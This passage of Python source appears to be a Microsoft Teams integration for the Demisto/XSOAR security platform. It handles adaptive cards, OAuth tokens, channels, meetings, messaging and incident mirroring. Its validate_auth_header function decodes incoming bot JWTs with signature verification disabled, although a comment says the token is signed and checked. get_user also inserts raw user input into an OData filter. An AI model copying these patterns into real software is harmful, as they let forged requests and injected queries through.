team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
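# Usage sketch (illustrative values only):
#   card = create_adaptive_card(
#       body=[{'type': 'TextBlock', 'text': 'Hello from Demisto'}],
#       actions=[{'type': 'Action.Submit', 'title': 'OK', 'data': {'response': 'OK'}}]
#   )
#   # card['content'] holds the card body; 'actions' is present only because it was passed.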
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
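# Illustrative TeamsAsk message payload consumed above (all values are examples only):
#   {
#       "message_text": "Approve blocking the suspicious IP?",
#       "entitlement": "4404dae8-2d45-46bd-85fa-64779c12abe8",
#       "options": ["Yes", "No"],
#       "investigation_id": "1234",
#       "task_id": "5"
#   }
# Each option becomes an Action.Submit button whose data echoes the entitlement details back.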
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('bot_access_token', '')
    valid_until: int = integration_context.get('bot_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('graph_access_token', '')
    valid_until: int = integration_context.get('graph_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
"""A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
Args:
method (str): any restful method
url (str): URL to query
json_ (dict): HTTP JSON body
api (str): API to query (graph/bot)
params (dict): Object of key-value URL query parameters
Returns:
Union[dict, list]: The response in list or dict format.
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL,
params=params,
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
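# Usage sketch (hypothetical team ID): list the channels of a team via the Graph API.
#   channels = http_request('GET', f'{GRAPH_BASE_URL}/v1.0/teams/<team-aad-id>/channels')
#   # For Graph list endpoints the parsed body typically looks like {'value': [...]}.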
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
    Validates the authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
    schema: str = parts[0]
jwt_token: str = parts[1]
    if schema != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt=jwt_token, options={'verify_signature': False})
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = get_integration_context()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
                demisto.info(f'Authorization header validation failed to fetch keys - {keys_response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True,
'verify_signature': False,
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
set_integration_context(integration_context)
return True
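# The header validated above is expected to look like (token value is illustrative, not real):
#   Authorization: Bearer eyJhbGciOiJSUzI1NiIs...<JWT>
# where the JWT is issued by https://api.botframework.com, signed with a key published via the
# Bot Framework Open ID configuration endpoint, and carries the bot ID in its 'aud' claim.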
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = get_integration_context()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
"""Retrieves the AAD ID of requested user
Args:
user (str): Display name/mail/UPN of user to get ID of.
Return:
        list: List containing the requested user object
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
params = {
'$filter': f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'",
'$select': 'id'
}
users = cast(Dict[Any, Any], http_request('GET', url, params=params))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
    Adds a user to a channel (private channels only, as the endpoint is still in beta)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user[0].get('id'))
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
"""
Creates a Microsoft Teams meeting
:param user_id: The User's ID
:param subject: The meeting's subject
:param start_date_time: The meeting's start time
:param end_date_time: The meeting's end time
:return: Dict with info about the created meeting.
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
request_json: dict = {
'subject': subject
}
if start_date_time:
request_json['startDateTime'] = start_date_time
if end_date_time:
request_json['endDateTime'] = end_date_time
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
return channel_data
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
subject: str = demisto.args().get('subject', '')
start_date_time: str = demisto.args().get('start_time', '')
end_date_time: str = demisto.args().get('end_time', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
thread_id = ''
message_id = ''
if chat_info := meeting_data.get('chatInfo', {}):
thread_id = chat_info.get('threadId', '')
message_id = chat_info.get('messageId', '')
participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
outputs = {
'creationDateTime': meeting_data.get('creationDateTime', ''),
'threadId': thread_id,
'messageId': message_id,
'id': meeting_data.get('id', ''),
'joinWebUrl': meeting_data.get('joinWebUrl', ''),
'participantId': participant_id,
'participantDisplayName': participant_display_name
}
result = CommandResults(
readable_output=f'The meeting "{subject}" was created successfully',
outputs_prefix='MicrosoftTeams.CreateMeeting',
outputs_key_field='id',
outputs=outputs
)
return_results(result)
def get_participant_info(participants: dict) -> Tuple[str, str]:
"""
Retrieves the participant ID and name
:param participants: The participants in the Team meeting
:return: The participant ID and name
"""
participant_id = ''
participant_display_name = ''
if participants:
user = participants.get('organizer', {}).get('identity', {}).get('user', {})
if user:
participant_id = user.get('id')
participant_display_name = user.get('displayName')
return participant_id, participant_display_name
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
    :param service_url: Bot service URL to query
    :param team_id: ID of team to get team members of
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = get_integration_context()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
    Input: 'good morning @Demisto;'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
if not (team_member or channel_name):
        raise ValueError('No channel or team member to send the message to was provided.')
if team_member and channel_name:
        raise ValueError('Provide either a channel or a team member to send the message to, not both.')
if not (message or adaptive_card):
        raise ValueError('No message or adaptive card to send was provided.')
if message and adaptive_card:
        raise ValueError('Provide either a message or an adaptive card to send, not both.')
integration_context: dict = get_integration_context()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = get_integration_context()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
